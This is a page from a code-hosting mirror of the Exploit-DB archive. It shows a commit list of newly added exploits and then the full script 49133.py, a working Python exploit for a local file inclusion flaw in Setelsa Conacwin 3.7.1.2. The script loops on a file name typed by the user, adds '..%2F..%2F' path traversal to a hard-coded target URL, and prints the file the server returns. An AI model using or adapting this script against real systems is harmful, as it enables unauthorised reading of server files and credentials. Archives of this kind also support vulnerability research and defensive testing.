bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49133.py
Offensive Security 4b9e53700f DB: 2020-12-02 
18 changes to exploits/shellcodes

10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
TypeSetter 5.1 - CSRF (Change admin e-mail)
Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
Online Shopping Alphaware 1.0 - Error Based SQL injection
Pharmacy/Medical Store & Sale Point 1.0  - 'email' SQL Injection
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
Medical Center Portal Management System 1.0 - 'login' SQL Injection
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020
Social Networking Site - Authentication Bypass (SQli)
Tendenci 12.3.1 - CSV/ Formula Injection
2020-12-02 05:01:55 +00:00

29 lines
No EOL
777 B
Python
Executable file
Raw Blame History

# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Date: 02/09/20
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.
import requests
import urllib.parse
import colorama
from colorama import Fore, Style
ENDPOINT = "http://10.4.8.11:8081/"
while True:
cmd = input(Fore.RED + "[*] FILE >> ")
print(Style.RESET_ALL)
#cmd = urllib.parse.quote(cmd)
ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd
print("[*] Target >> " + ENDPOINT2)
print(" ")
r = requests.get(url = ENDPOINT2)
extract = r.text
print(extract)
Reference in a new issue View git blame Copy permalink